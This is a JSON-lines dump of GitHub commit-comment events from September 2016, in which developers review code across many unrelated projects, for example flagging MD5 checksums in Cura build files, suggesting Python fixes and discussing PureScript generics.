{"id":"4517144154","type":"CommitCommentEvent","actor":{"login":"svx"},"repo":{"name":"testthedocs/ttd.training-docs-basics"},"payload":{"comment":{"id":18900817,"position":null,"line":null,"path":null,"commit_id":"7139b79b4c6dcd50019f82719537ef7c0872db3c","created_at":"2016-09-05T14:17:33Z","updated_at":"2016-09-05T14:17:33Z","body":"I am working on it !"}},"created_at":"2016-09-05T14:17:33Z"}
{"id":"4517149231","type":"CommitCommentEvent","actor":{"login":"bmckinney"},"repo":{"name":"sbgrid/data-capture-module"},"payload":{"comment":{"id":18900827,"position":null,"line":null,"path":null,"commit_id":"f2909586b002bfa5ba83a86d6421834ef4e25298","created_at":"2016-09-05T14:18:37Z","updated_at":"2016-09-05T14:18:37Z","body":"curl removes linebreaks from data posted with the -d option, we should use --data-binary"}},"created_at":"2016-09-05T14:18:37Z"}
{"id":"4517150466","type":"CommitCommentEvent","actor":{"login":"crunchyNYC"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":18900829,"position":null,"line":null,"path":null,"commit_id":"844e4ef7c95aa2930fcb5dc76f9c16affc6b8770","created_at":"2016-09-05T14:18:53Z","updated_at":"2016-09-05T14:18:53Z","body":"Me too, I want to learn how to tune on my own machine. So far, trial and error has not worked for me."}},"created_at":"2016-09-05T14:18:53Z"}
{"id":"4517151392","type":"CommitCommentEvent","actor":{"login":"nimasmi"},"repo":{"name":"torchbox/wagtail-torchbox"},"payload":{"comment":{"id":18900831,"position":null,"line":null,"path":null,"commit_id":"b674ac6be3189a36cc1d78f6c0444f7dc42d11d4","created_at":"2016-09-05T14:19:07Z","updated_at":"2016-09-05T14:19:07Z","body":"> Will avoid\r\n\r\nwioll on-have pre-when fore-wenta re-avoid"}},"created_at":"2016-09-05T14:19:07Z"}
{"id":"4517153588","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"CyanogenMod/android_device_samsung_jf-common"},"payload":{"comment":{"id":18900837,"position":null,"line":null,"path":null,"commit_id":"d9d51fc7273fd290ab516a9c8bba75f948c72739","created_at":"2016-09-05T14:19:36Z","updated_at":"2016-09-05T14:19:36Z","body":"@zwliew check out the commit mate..there are some typos at lines 162 and 159"}},"created_at":"2016-09-05T14:19:36Z"}
{"id":"4517153593","type":"CommitCommentEvent","actor":{"login":"sillitoe"},"repo":{"name":"sillitoe/cath-tools-seqscan"},"payload":{"comment":{"id":18900838,"position":null,"line":null,"path":null,"commit_id":"8fa3bcd96bfa1ce0e40e793beb310dc66062b61e","created_at":"2016-09-05T14:19:36Z","updated_at":"2016-09-05T14:19:36Z","body":"#2 "}},"created_at":"2016-09-05T14:19:36Z"}
{"id":"4517154563","type":"CommitCommentEvent","actor":{"login":"lionng429"},"repo":{"name":"lionng429/react-file-uploader"},"payload":{"comment":{"id":18900840,"position":98,"line":71,"path":"src/UploadHandler.js","commit_id":"1dc67af3c15c6109122f05f0dbc8e205dbcb1fd8","created_at":"2016-09-05T14:19:49Z","updated_at":"2016-09-05T14:19:49Z","body":"I didn't because the upload function the UploadHanlder is wrapped by UploadManager and the upload function property is prepared and injected by the it by default.\r\n\r\nHowever, you don't have to use UploadHandler and UploadManager together. You can compose your own upload strategy and inject into it.\r\n\r\nAlso, by definition an UploadHandler is to upload a file, so an upload function is always required.\r\n\r\nDoes it make sense?"}},"created_at":"2016-09-05T14:19:49Z"}
{"id":"4517154811","type":"CommitCommentEvent","actor":{"login":"EdwardStudy"},"repo":{"name":"EdwardStudy/myghostblog"},"payload":{"comment":{"id":18900843,"position":null,"line":null,"path":null,"commit_id":"01d489db69425db468e1133bcdfe7ee8a5c13fe3","created_at":"2016-09-05T14:19:52Z","updated_at":"2016-09-05T14:19:52Z","body":"modify font and date format"}},"created_at":"2016-09-05T14:19:52Z"}
{"id":"4517155209","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/cura-build-environment"},"payload":{"comment":{"id":18900844,"position":36,"line":36,"path":"projects/pyqt.cmake","commit_id":"5762b5ef54f2e6bba13cae99616ce1e29be57d65","created_at":"2016-09-05T14:19:58Z","updated_at":"2016-09-05T14:19:58Z","body":"Another one that's still MD5 instead of something modern."}},"created_at":"2016-09-05T14:19:58Z"}
{"id":"4517156234","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/cura-build-environment"},"payload":{"comment":{"id":18900847,"position":4,"line":4,"path":"projects/pyserial.cmake","commit_id":"5762b5ef54f2e6bba13cae99616ce1e29be57d65","created_at":"2016-09-05T14:20:13Z","updated_at":"2016-09-05T14:20:13Z","body":"Another one that's still MD5 instead of something modern."}},"created_at":"2016-09-05T14:20:13Z"}
{"id":"4517157139","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/cura-build-environment"},"payload":{"comment":{"id":18900848,"position":9,"line":9,"path":"projects/python.cmake","commit_id":"5762b5ef54f2e6bba13cae99616ce1e29be57d65","created_at":"2016-09-05T14:20:24Z","updated_at":"2016-09-05T14:20:24Z","body":"Another one that's still MD5 instead of something modern."}},"created_at":"2016-09-05T14:20:24Z"}
{"id":"4517158736","type":"CommitCommentEvent","actor":{"login":"zwliew"},"repo":{"name":"CyanogenMod/android_device_samsung_jf-common"},"payload":{"comment":{"id":18900850,"position":null,"line":null,"path":null,"commit_id":"d9d51fc7273fd290ab516a9c8bba75f948c72739","created_at":"2016-09-05T14:20:44Z","updated_at":"2016-09-05T14:20:44Z","body":"what typos?"}},"created_at":"2016-09-05T14:20:44Z"}
{"id":"4517159034","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/cura-build-environment"},"payload":{"comment":{"id":18900851,"position":61,"line":61,"path":"projects/qt.cmake","commit_id":"5762b5ef54f2e6bba13cae99616ce1e29be57d65","created_at":"2016-09-05T14:20:48Z","updated_at":"2016-09-05T14:20:48Z","body":"Another one that's still MD5 instead of something modern."}},"created_at":"2016-09-05T14:20:48Z"}
{"id":"4517159810","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/cura-build-environment"},"payload":{"comment":{"id":18900854,"position":4,"line":4,"path":"projects/scipy.cmake","commit_id":"5762b5ef54f2e6bba13cae99616ce1e29be57d65","created_at":"2016-09-05T14:20:59Z","updated_at":"2016-09-05T14:20:59Z","body":"You get the picture."}},"created_at":"2016-09-05T14:20:59Z"}
{"id":"4517160329","type":"CommitCommentEvent","actor":{"login":"javelinanddart"},"repo":{"name":"CyanogenMod/android_device_samsung_jf-common"},"payload":{"comment":{"id":18900856,"position":null,"line":null,"path":null,"commit_id":"d9d51fc7273fd290ab516a9c8bba75f948c72739","created_at":"2016-09-05T14:21:08Z","updated_at":"2016-09-05T14:21:08Z","body":"@dkati: Those dashes are intentionally there"}},"created_at":"2016-09-05T14:21:08Z"}
{"id":"4517160521","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/cura-build-environment"},"payload":{"comment":{"id":18900857,"position":29,"line":29,"path":"projects/sip.cmake","commit_id":"5762b5ef54f2e6bba13cae99616ce1e29be57d65","created_at":"2016-09-05T14:21:11Z","updated_at":"2016-09-05T14:21:11Z","body":"And the last one."}},"created_at":"2016-09-05T14:21:11Z"}
{"id":"4517161897","type":"CommitCommentEvent","actor":{"login":"jackha"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18900863,"position":17,"line":813,"path":"cura/Settings/MachineManager.py","commit_id":"67636d6f3c8d0f6f10d986b0591d9ed71a3d53bd","created_at":"2016-09-05T14:21:29Z","updated_at":"2016-09-05T14:21:29Z","body":"Why does this fix anything?"}},"created_at":"2016-09-05T14:21:29Z"}
{"id":"4517162671","type":"CommitCommentEvent","actor":{"login":"congnt0910"},"repo":{"name":"rt2zz/react-native-contacts"},"payload":{"comment":{"id":18900865,"position":55,"line":211,"path":"android/src/main/java/com/rt2zz/reactnativecontacts/ContactsProvider.java","commit_id":"86061465ef4e786748270558ce93fd57bf8cc646","created_at":"2016-09-05T14:21:40Z","updated_at":"2016-09-05T14:21:40Z","body":"private String getPhotoURIFromContactURI(String contactURIString, int contactId)\r\nI think may be wrong a bit. `contactId` should be String"}},"created_at":"2016-09-05T14:21:40Z"}
{"id":"4517162914","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"CyanogenMod/android_device_samsung_jf-common"},"payload":{"comment":{"id":18900866,"position":null,"line":null,"path":null,"commit_id":"d9d51fc7273fd290ab516a9c8bba75f948c72739","created_at":"2016-09-05T14:21:43Z","updated_at":"2016-09-05T14:21:43Z","body":"oh ...sht happens....lack of knowledge :) deleting my comment\r\n"}},"created_at":"2016-09-05T14:21:43Z"}
{"id":"4517163547","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/cura-build-environment"},"payload":{"comment":{"id":18900867,"position":2,"line":2,"path":"projects/zeroconf.cmake","commit_id":"5762b5ef54f2e6bba13cae99616ce1e29be57d65","created_at":"2016-09-05T14:21:51Z","updated_at":"2016-09-05T14:21:51Z","body":"This is still missing the hash."}},"created_at":"2016-09-05T14:21:51Z"}
{"id":"4517165517","type":"CommitCommentEvent","actor":{"login":"wesm"},"repo":{"name":"apache/parquet-cpp"},"payload":{"comment":{"id":18900870,"position":null,"line":null,"path":null,"commit_id":"fa6e47616e818f33d8d4774ce43ae6d62cdd59bd","created_at":"2016-09-05T14:22:20Z","updated_at":"2016-09-05T14:22:20Z","body":"Good point. I guess the worst case scenario is a chain of:\r\n\r\n8 repeated values\r\n8 literal values\r\n8 repeated values ...\r\n\r\nThink this supersedes both of the cases in the `std::max` comparison right now. Should have thought a little harder about this"}},"created_at":"2016-09-05T14:22:20Z"}
{"id":"4517166344","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"jcalovski/Stockfish"},"payload":{"comment":{"id":18900874,"position":null,"line":null,"path":null,"commit_id":"c9f56148756586b43a73fd8a365bfc20a32cbff9","created_at":"2016-09-05T14:22:31Z","updated_at":"2016-09-05T14:22:31Z","body":"Good luck..."}},"created_at":"2016-09-05T14:22:31Z"}
{"id":"4517167249","type":"CommitCommentEvent","actor":{"login":"indesign47"},"repo":{"name":"zedx/core"},"payload":{"comment":{"id":18900875,"position":null,"line":null,"path":null,"commit_id":"75e54c53de5f1aaa2514c0fb89b7781e103858bc","created_at":"2016-09-05T14:22:43Z","updated_at":"2016-09-05T14:22:43Z","body":"I never found this solution."}},"created_at":"2016-09-05T14:22:43Z"}
{"id":"4517167414","type":"CommitCommentEvent","actor":{"login":"blerner"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18900876,"position":75,"line":0,"path":"src/web/js/trove/d3-lib.js","commit_id":"dc515df3593b75bd82747dc579c1cde873e1fcb1","created_at":"2016-09-05T14:22:46Z","updated_at":"2016-09-05T14:22:46Z","body":"I'm thinking maybe these should be named `extendX` and y, rather than scale: because then I'd think that the neutral value for extension is 0, rather than the neutral value for scaling be 1. And you could add an annotation of these asserting they're in the range [0,1] and document then add percentages..."}},"created_at":"2016-09-05T14:22:46Z"}
{"id":"4517169222","type":"CommitCommentEvent","actor":{"login":"nocnokneo"},"repo":{"name":"google/googletest"},"payload":{"comment":{"id":18900880,"position":null,"line":null,"path":null,"commit_id":"98d988deac06637364f6cd41c45c3db4a8a0b6bc","created_at":"2016-09-05T14:23:10Z","updated_at":"2016-09-05T14:23:10Z","body":"I can't speak for the GTest team, but I can give you some background.\r\n\r\nThe opinion of the GTest team is that GTest should always be built by the consuming project so that GTest can be built with the exact same compiler, compiler flags, libraries, etc.\r\n\r\nThe case I made for adding install rules to the CMake build was that \"super builds\" are a common way to structure CMake-based projects which satisfies the need to compile GTest with all the same compile flags. But super builds are much simpler to use when the external projects like GTest have proper install rules setup (the super build uses the install rules to install external projects into a staging directory within the build directory)"}},"created_at":"2016-09-05T14:23:10Z"}
{"id":"4517173760","type":"CommitCommentEvent","actor":{"login":"Riztazz"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18900889,"position":9,"line":9,"path":"sql/updates/world/6.x/2016_09_05_06_world.sql","commit_id":"8d8489ccfcb99fa00442d8a208ae1ed149ca8ae2","created_at":"2016-09-05T14:24:08Z","updated_at":"2016-09-05T14:24:08Z","body":"you really shouldnt code while you're on cocaine"}},"created_at":"2016-09-05T14:24:08Z"}
{"id":"4517175815","type":"CommitCommentEvent","actor":{"login":"akegalj"},"repo":{"name":"eskimor/purescript-bridge"},"payload":{"comment":{"id":18900894,"position":141,"line":178,"path":"src/Language/PureScript/Bridge/Builder.hs","commit_id":"42e5cbfda655428c98419a78e123f3ce61de4d2e","created_at":"2016-09-05T14:24:36Z","updated_at":"2016-09-05T14:24:36Z","body":"Instead of doing something generic as this, wouldn't it be better to have in `TypeParameters` module sum type like:\r\n```\r\ndata TypeParam = A | B | C .... | A1 |.... \r\n```\r\nIf you agree, I will make this change. It feels safer?"}},"created_at":"2016-09-05T14:24:36Z"}
{"id":"4517179419","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":18900900,"position":null,"line":null,"path":null,"commit_id":"844e4ef7c95aa2930fcb5dc76f9c16affc6b8770","created_at":"2016-09-05T14:25:26Z","updated_at":"2016-09-05T14:25:26Z","body":"Hi Jörg, crunchy, I am working in a position based very fast global tuner. Give me some more time and then I will share it."}},"created_at":"2016-09-05T14:25:26Z"}
{"id":"4517183009","type":"CommitCommentEvent","actor":{"login":"zorx"},"repo":{"name":"zedx/core"},"payload":{"comment":{"id":18900907,"position":null,"line":null,"path":null,"commit_id":"75e54c53de5f1aaa2514c0fb89b7781e103858bc","created_at":"2016-09-05T14:26:12Z","updated_at":"2016-09-05T14:26:12Z","body":"I just make a refactor, to avoid writing the same thing twice"}},"created_at":"2016-09-05T14:26:12Z"}
{"id":"4517183213","type":"CommitCommentEvent","actor":{"login":"huayi"},"repo":{"name":"junjun1092/beego-blog"},"payload":{"comment":{"id":18900908,"position":null,"line":null,"path":null,"commit_id":"a19d3e13f041b0b194c9d5d1329a123d2939bcc1","created_at":"2016-09-05T14:26:14Z","updated_at":"2016-09-05T14:26:14Z","body":"你的进步实在太快了,  眼看就能出师了, 加油!"}},"created_at":"2016-09-05T14:26:14Z"}
{"id":"4517184810","type":"CommitCommentEvent","actor":{"login":"zerolab"},"repo":{"name":"torchbox/wagtail-torchbox"},"payload":{"comment":{"id":18900913,"position":null,"line":null,"path":null,"commit_id":"b674ac6be3189a36cc1d78f6c0444f7dc42d11d4","created_at":"2016-09-05T14:26:34Z","updated_at":"2016-09-05T14:26:34Z","body":"🙈 🙉 "}},"created_at":"2016-09-05T14:26:34Z"}
{"id":"4517186971","type":"CommitCommentEvent","actor":{"login":"sayali-kotkar"},"repo":{"name":"serenity-dojo/vet-clinic"},"payload":{"comment":{"id":18900920,"position":19,"line":19,"path":"src/main/java/serenitylabs/tutorials/vetclinic/enumerations/colours/Colour.java","commit_id":"a9423325f427dd32c35a45705aef11e0d5cb0515","created_at":"2016-09-05T14:27:02Z","updated_at":"2016-09-05T14:27:02Z","body":"I had used that earlier but then it failed with illegal forward reference ."}},"created_at":"2016-09-05T14:27:02Z"}
{"id":"4517195149","type":"CommitCommentEvent","actor":{"login":"skyjake"},"repo":{"name":"skyjake/Doomsday-Engine"},"payload":{"comment":{"id":18900935,"position":null,"line":null,"path":null,"commit_id":"d26b297e1c18398c2294046adf9cfe49564694da","created_at":"2016-09-05T14:28:42Z","updated_at":"2016-09-05T14:28:42Z","body":"Here's a backtrace:\r\n```\r\nThread 1 \"doomsday\" received signal SIGSEGV, Segmentation fault.\r\nQList<de::String>::~QList (this=0x7fffffffdb4c, __in_chrg=<optimized out>) at /usr/include/x86_64-linux-gnu/qt5/QtCore/qlist.h:795\r\n795\t    if (!d->ref.deref())\r\n(gdb) bt\r\n#0  QList<de::String>::~QList (this=0x7fffffffdb4c, __in_chrg=<optimized out>) at /usr/include/x86_64-linux-gnu/qt5/QtCore/qlist.h:795\r\n#1  0x00007ffff780fc35 in de::CommandLine::ArgWithParams::~ArgWithParams (this=0x7fffffffdb40, __in_chrg=<optimized out>)\r\n    at /home/jaakko/src/deng/doomsday/sdk/libcore/include/de/core/commandline.h:50\r\n#2  Resources::Impl::Impl (this=0x13ab4c0, i=<optimized out>) at apps/libdoomsday/src_resource_turbo.cpp:1314\r\n#3  0x00007ffff77f4410 in Resources::Resources (this=0x139a0d0) at apps/libdoomsday/src_resource_turbo.cpp:1325\r\n#4  0x000000000065f3b1 in ClientResources::ClientResources (this=0x139a0d0) at apps/client/src_resource_turbo.cpp:3928\r\n#5  0x000000000057eb4b in ClientApp::initialize (this=this@entry=0x7fffffffdec0) at /home/jaakko/src/deng/doomsday/apps/client/src/clientapp.cpp:583\r\n#6  0x0000000000556018 in main (argc=1, argv=<optimized out>) at /home/jaakko/src/deng/doomsday/apps/client/src/main_client.cpp:76\r\n```"}},"created_at":"2016-09-05T14:28:42Z"}
{"id":"4517196997","type":"CommitCommentEvent","actor":{"login":"blerner"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18900938,"position":217,"line":0,"path":"src/web/js/trove/d3-lib.js","commit_id":"dc515df3593b75bd82747dc579c1cde873e1fcb1","created_at":"2016-09-05T14:29:11Z","updated_at":"2016-09-05T14:29:11Z","body":"@jpolitz, this line worries me. Don't we normally only use pauseStack in tail position? "}},"created_at":"2016-09-05T14:29:11Z"}
{"id":"4517198889","type":"CommitCommentEvent","actor":{"login":"pWnH"},"repo":{"name":"pWnH/YouQueue"},"payload":{"comment":{"id":18900943,"position":null,"line":null,"path":null,"commit_id":"0bb59b1448e7bf0891ed30652dea77942fbdbaf2","created_at":"2016-09-05T14:29:35Z","updated_at":"2016-09-05T14:29:35Z","body":"+ queuelist is now sortable"}},"created_at":"2016-09-05T14:29:35Z"}
{"id":"4517199170","type":"CommitCommentEvent","actor":{"login":"Kinzcool"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18900945,"position":9,"line":9,"path":"sql/updates/world/6.x/2016_09_05_06_world.sql","commit_id":"8d8489ccfcb99fa00442d8a208ae1ed149ca8ae2","created_at":"2016-09-05T14:29:39Z","updated_at":"2016-09-05T14:29:39Z","body":"Blizzard is always on cocaine while they code."}},"created_at":"2016-09-05T14:29:39Z"}
{"id":"4517200257","type":"CommitCommentEvent","actor":{"login":"sjnorth"},"repo":{"name":"gocardless/splash-pages"},"payload":{"comment":{"id":18900954,"position":null,"line":null,"path":null,"commit_id":"4e6292a308e64ca53da8537b7f205131ec9444fc","created_at":"2016-09-05T14:29:54Z","updated_at":"2016-09-05T14:29:54Z","body":"@Ken-Lo this doesn't seem to have updated in the live site..."}},"created_at":"2016-09-05T14:29:54Z"}
{"id":"4517205844","type":"CommitCommentEvent","actor":{"login":"AbuBaniaz"},"repo":{"name":"OpenPLi/enigma2"},"payload":{"comment":{"id":18900969,"position":null,"line":null,"path":null,"commit_id":"1a9cab49727e268e95588b84d0fb931fd32f32aa","created_at":"2016-09-05T14:31:10Z","updated_at":"2016-09-05T14:31:10Z","body":"The button positions are wrong. Pull request to correct here:\r\nhttps://github.com/OpenPLi/enigma2/pull/395"}},"created_at":"2016-09-05T14:31:10Z"}
{"id":"4517212549","type":"CommitCommentEvent","actor":{"login":"rakshans1"},"repo":{"name":"rakshans1/docstash"},"payload":{"comment":{"id":18900980,"position":null,"line":null,"path":null,"commit_id":"c06aebcbde96edae998a52df8e37c061a2a79513","created_at":"2016-09-05T14:32:37Z","updated_at":"2016-09-05T14:32:37Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;BEYBe5i7&#x2F;127-torrent-implementation\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Torrent Implementation</a>"}},"created_at":"2016-09-05T14:32:37Z"}
{"id":"4517212684","type":"CommitCommentEvent","actor":{"login":"blerner"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18900981,"position":53,"line":0,"path":"src/web/js/trove/plot-lib.js","commit_id":"dc515df3593b75bd82747dc579c1cde873e1fcb1","created_at":"2016-09-05T14:32:39Z","updated_at":"2016-09-05T14:32:39Z","body":"*LOTS* of magic constants around here... Where do they come from, why did they changed and what do they all do? "}},"created_at":"2016-09-05T14:32:39Z"}
{"id":"4517214776","type":"CommitCommentEvent","actor":{"login":"Therzok"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":18900988,"position":15,"line":139,"path":"main/src/addins/CSharpBinding/MonoDevelop.CSharp.CodeFixes/MoveTypeToFile/MoveTypeToFile.cs","commit_id":"b4ac3b5e5df12d79660b9807a5dba1e2059d0fb5","created_at":"2016-09-05T14:33:08Z","updated_at":"2016-09-05T14:33:08Z","body":"Why are we not awaiting the save?"}},"created_at":"2016-09-05T14:33:08Z"}
{"id":"4517215927","type":"CommitCommentEvent","actor":{"login":"jdfrankland"},"repo":{"name":"kaliveda-dev/kaliveda"},"payload":{"comment":{"id":18900990,"position":null,"line":null,"path":null,"commit_id":"85c65e381a36d112e92591b5bb68a195fd4479d0","created_at":"2016-09-05T14:33:23Z","updated_at":"2016-09-05T14:33:23Z","body":"Hi giuseppe\r\nstd::abs IS normal abs, at least for C++!!\r\nsee here http://www.cplusplus.com/reference/cmath/abs/ and also here http://stackoverflow.com/questions/1374037/ambiguous-overload-call-to-absdouble"}},"created_at":"2016-09-05T14:33:23Z"}
{"id":"4517216830","type":"CommitCommentEvent","actor":{"login":"ptrgags"},"repo":{"name":"KarishmaChanglani/Pentago"},"payload":{"comment":{"id":18900991,"position":20,"line":20,"path":"Pentago.py","commit_id":"72543b209fe7c4b8a2c605ad6836869950a0d525","created_at":"2016-09-05T14:33:32Z","updated_at":"2016-09-05T14:33:32Z","body":"copy.deepcopy() would work great here"}},"created_at":"2016-09-05T14:33:32Z"}
{"id":"4517219494","type":"CommitCommentEvent","actor":{"login":"m4c-4rthur"},"repo":{"name":"m4c-4rthur/GoEuroTest"},"payload":{"comment":{"id":18901022,"position":null,"line":null,"path":null,"commit_id":"0fa736348dbd8db05e19a3e3186de773fbecfb31","created_at":"2016-09-05T14:34:10Z","updated_at":"2016-09-05T14:34:10Z","body":"The Fat jar of the app"}},"created_at":"2016-09-05T14:34:10Z"}
{"id":"4517220478","type":"CommitCommentEvent","actor":{"login":"ptrgags"},"repo":{"name":"KarishmaChanglani/Pentago"},"payload":{"comment":{"id":18901025,"position":31,"line":31,"path":"Pentago.py","commit_id":"72543b209fe7c4b8a2c605ad6836869950a0d525","created_at":"2016-09-05T14:34:22Z","updated_at":"2016-09-05T14:34:22Z","body":"use `//` instead of `/` and then no need for `math.floor()`"}},"created_at":"2016-09-05T14:34:22Z"}
{"id":"4517222967","type":"CommitCommentEvent","actor":{"login":"eskimor"},"repo":{"name":"eskimor/purescript-bridge"},"payload":{"comment":{"id":18901026,"position":141,"line":178,"path":"src/Language/PureScript/Bridge/Builder.hs","commit_id":"42e5cbfda655428c98419a78e123f3ce61de4d2e","created_at":"2016-09-05T14:34:52Z","updated_at":"2016-09-05T14:34:52Z","body":"So instead of replacing stuff from any module name `TypeParameters` you would only replace types of a kind named `TypeParam`? Do I understand this correctly? I am not sure at what you are aiming and what you mean by safer?\r\n\r\nThe idea of allowing any module named TypeParameters is that the user can have his own `TypeParameters` module if he needs different named type parameters.\r\n\r\nAlso I am not sure how you do Generics on the kind level. I think I need a better explanation of both the problem and your proposed solution ;-)"}},"created_at":"2016-09-05T14:34:52Z"}
{"id":"4517224088","type":"CommitCommentEvent","actor":{"login":"gcshekar08"},"repo":{"name":"gcshekar08/udacity_pro"},"payload":{"comment":{"id":18901032,"position":null,"line":null,"path":null,"commit_id":"f5b9c4e17f990bff4ba61a61c2643ae4f47ea1ac","created_at":"2016-09-05T14:35:10Z","updated_at":"2016-09-05T14:35:10Z","body":"docs: changes to documentation"}},"created_at":"2016-09-05T14:35:10Z"}
{"id":"4517227535","type":"CommitCommentEvent","actor":{"login":"funjoker"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18901043,"position":null,"line":null,"path":null,"commit_id":"cfaf8fc34fa9edddc4c02bc375fd340ba7a2cd66","created_at":"2016-09-05T14:35:50Z","updated_at":"2016-09-05T14:35:50Z","body":"22498 ????"}},"created_at":"2016-09-05T14:35:50Z"}
{"id":"4517228998","type":"CommitCommentEvent","actor":{"login":"chsievers"},"repo":{"name":"sdiehl/write-you-a-haskell"},"payload":{"comment":{"id":18901047,"position":71,"line":150,"path":"006_hindley_milner.md","commit_id":"73b43dcf89210e75b508694df675961b4e22e0ff","created_at":"2016-09-05T14:36:11Z","updated_at":"2016-09-05T14:36:11Z","body":"This example also breaks the first functor law ``fmap id = id``.\r\nI think if we have this, then the second law comes as a free theorem."}},"created_at":"2016-09-05T14:36:11Z"}
{"id":"4517231013","type":"CommitCommentEvent","actor":{"login":"samybob1"},"repo":{"name":"lionng429/react-file-uploader"},"payload":{"comment":{"id":18901052,"position":98,"line":71,"path":"src/UploadHandler.js","commit_id":"1dc67af3c15c6109122f05f0dbc8e205dbcb1fd8","created_at":"2016-09-05T14:36:39Z","updated_at":"2016-09-05T14:36:39Z","body":"I know that the upload function is injected by default and I want to use this injected function, but I get a warning because I haven't passed an \"upload\" prop, so I don't think it should be required."}},"created_at":"2016-09-05T14:36:39Z"}
{"id":"4517235898","type":"CommitCommentEvent","actor":{"login":"JRooneyBusiness"},"repo":{"name":"fusionpbx/fusionpbx"},"payload":{"comment":{"id":18901061,"position":17,"line":261,"path":"resources/install/scripts/intercept.lua","commit_id":"15fbc21b4d5dbb2dee9e39308801188150d2c3b7","created_at":"2016-09-05T14:37:46Z","updated_at":"2016-09-05T14:37:46Z","body":"Hi Moteus\r\n\r\nre-reading my comment i realise i didn't explian my point clearly. \r\n\r\nCustomer experienced an issue, where they would pick up their colleagues calls rarely. \r\nI tested this and found that it was due to how the \r\nSQL queriy selects the call to intercept; \r\n1) checks \"call-state RINGING\" \r\n2) Checks if there are outbound calls\r\n3) Checks if there are inbound calls. \r\n\r\nIf you call-intercept when there is an inbound and outbound call, both in the ringing call state, the current script will grab the outbound call.\r\n\r\nThank you for taking the time to clarify the Fusion/FS handling. \r\n"}},"created_at":"2016-09-05T14:37:46Z"}
{"id":"4517256605","type":"CommitCommentEvent","actor":{"login":"Vincent-Michael"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18901105,"position":null,"line":null,"path":null,"commit_id":"cfaf8fc34fa9edddc4c02bc375fd340ba7a2cd66","created_at":"2016-09-05T14:42:28Z","updated_at":"2016-09-05T14:42:28Z","body":"and now?"}},"created_at":"2016-09-05T14:42:28Z"}
{"id":"4517261592","type":"CommitCommentEvent","actor":{"login":"smichae"},"repo":{"name":"yiisoft/yii2-app-basic"},"payload":{"comment":{"id":18901116,"position":null,"line":null,"path":null,"commit_id":"b1015559e013357b16acd1cdd8ab13eb95015509","created_at":"2016-09-05T14:43:36Z","updated_at":"2016-09-05T14:43:36Z","body":"@DavertMik With this refactoring, any thoughts on if framework/test/InitDbFixture should be adjusted to get rid of 'tests' in the $initScript in the next major release?  (And corresponding documentation in guide-test-fixtures?)"}},"created_at":"2016-09-05T14:43:36Z"}
{"id":"4517263533","type":"CommitCommentEvent","actor":{"login":"cloudse"},"repo":{"name":"chekun/AppStore"},"payload":{"comment":{"id":18901118,"position":null,"line":null,"path":null,"commit_id":"9a179e61663862f8782f5da9bb5cfe473888f1ce","created_at":"2016-09-05T14:44:03Z","updated_at":"2016-09-05T14:44:03Z","body":"502 Bad Gateway"}},"created_at":"2016-09-05T14:44:03Z"}
{"id":"4517265197","type":"CommitCommentEvent","actor":{"login":"iamsaurabhc"},"repo":{"name":"iamsaurabhc/learn-chaincode"},"payload":{"comment":{"id":18901126,"position":null,"line":null,"path":null,"commit_id":"bf387ec965a1381ab21c209a0422ea5de5ed7ab6","created_at":"2016-09-05T14:44:26Z","updated_at":"2016-09-05T14:44:26Z","body":"<img width=\"734\" alt=\"a\" src=\"https://cloud.githubusercontent.com/assets/19235748/18251192/4d6800bc-73a5-11e6-9ac0-5518630c0480.PNG\">\r\nGetting this error Constantly"}},"created_at":"2016-09-05T14:44:26Z"}
{"id":"4517268159","type":"CommitCommentEvent","actor":{"login":"akegalj"},"repo":{"name":"eskimor/purescript-bridge"},"payload":{"comment":{"id":18901130,"position":141,"line":178,"path":"src/Language/PureScript/Bridge/Builder.hs","commit_id":"42e5cbfda655428c98419a78e123f3ce61de4d2e","created_at":"2016-09-05T14:45:12Z","updated_at":"2016-09-05T14:45:12Z","body":"> The idea of allowing any module named TypeParameters is that the user can have his own TypeParameters module if he needs different named type parameters.\r\nOk, I see. I thought it is \"not safe\" to have this general rule. Then user can name its module \"TypeParameters\" and have unexpected behaviour (because he doesn't know about this convention). But as this is functionality that is aimed to, then I guess it makes sense to implement it like you did.\r\n\r\n> Also I am not sure how you do Generics on the kind level. I think I need a better explanation of both the problem and your proposed solution ;-)\r\nRight now I am extending https://github.com/eskimor/purescript-bridge/blob/master/src/Language/PureScript/Bridge/Printer.hs#L77 so that it can create instances like \r\n```\r\ndata WithMetadata a b =\r\n    WithMetadata {\r\n      wmValue :: a\r\n    , wmMetadata :: b\r\n    }\r\n\r\nderive instance genericWithMetadata :: (Generic a, Generic b) => Generic (WithMetadata a b)\r\n```\r\nCurrent implementation doesn't put `Generic` constrains to type parameters.\r\n\r\nWill make PR when it is done."}},"created_at":"2016-09-05T14:45:12Z"}
